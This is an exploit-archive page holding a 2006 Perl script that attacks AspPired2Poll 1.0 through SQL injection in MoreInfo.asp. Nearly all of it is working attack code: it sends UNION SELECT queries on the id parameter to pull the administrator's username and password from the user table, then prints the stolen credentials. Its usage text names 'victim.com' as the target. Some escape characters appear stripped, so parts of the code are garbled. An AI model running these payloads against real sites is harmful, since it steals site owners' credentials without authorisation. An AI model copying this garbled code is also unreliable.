[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : AspPired2Poll <= 1.0 (MoreInfo.asp) Remote SQL Injection Exploit
# Published : 2006-11-09
# Author : ajann
# Previous Title : gtcatalog <= 0.9.1 (index.php) Remote File Include Vulnerability
# Next Title : phpManta <= 1.0.2 (view-sourcecode.php) Local File Include Exploit


#!/usr/bin/perl
#[Script Name: AspPired2 Poll <= 1.0 (MoreInfo.asp) Remote SQL Injection Exploit
#[Coded by   : ajann
#[Author     : ajann
#[Contact    : :(

use IO::Socket;
if(@ARGV < 3){
print "
[========================================================================
[//  AspPired2 Poll <= 1.0 (MoreInfo.asp) Remote SQL Injection Exploit
[//           Usage: class.pl [target] [path] [userid]
[//                   Example: exploit.pl victim.com / 1
[//                   Example: exploit.pl victim.com /path/ 1
[//                           Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http://)//eg;
$host = "http://".$server;
$port = "80";
$dir = $ARGV[1];
$file = "MoreInfo.asp?id=";
$target = "-1+union+select+login+from+user+where+no+like%20".$ARGV[2];
$target = $host.$dir.$file.$target;

$targettwo = "-1+union+select+password+from+user+where+no+like%20".$ARGV[2];
$targettwo = $host.$dir.$file.$targettwo;



#Writing data to socket
print "+**********************************************************************+n";
print "+ Trying to connect: $servern";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "n+ Connection failed...n";
print $socket "GET $targetn";
print $socket "Host: $servern";
print $socket "Accept: */*n";
print $socket "Connection: closenn";
print "+ Connected!...n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /ltext">(.*?)</td>/){ 
print "+ Exploit succeed! Getting admin information.n";
print "+ ---------------- +n";
print "+ Username: $1n";

print "+**********************************************************************+n";
print "+ Trying to connect for Password: $servern";
$socket1 = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "n+ Connection failed...n";
print $socket1 "GET $targettwon";
print $socket1 "Host: $servern";
print $socket1 "Accept: */*n";
print $socket1 "Connection: closenn";
print "+ Connected!...n";
#Getting
while($answer = <$socket1>) {
if ($answer =~ /ltext">(.*?)</td>/){ 
print "+ Exploit succeed! Getting admin information.n";
print "+ ---------------- +n";
print "+ Password: $1n";
print "+**********************************************************************+n";
exit();
}


if ($answer =~ /Ad removed or not yet approved/) { 
print "+ Exploit Failed : ( n";
print "+**********************************************************************+n";
exit(); 
}

if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : (  n";
print "+**********************************************************************+n";
exit(); 
}
 }
   } 
    }
print "+ Exploit failed :(n";
print "+**********************************************************************+n";

# www.Syue.com [2006-11-09]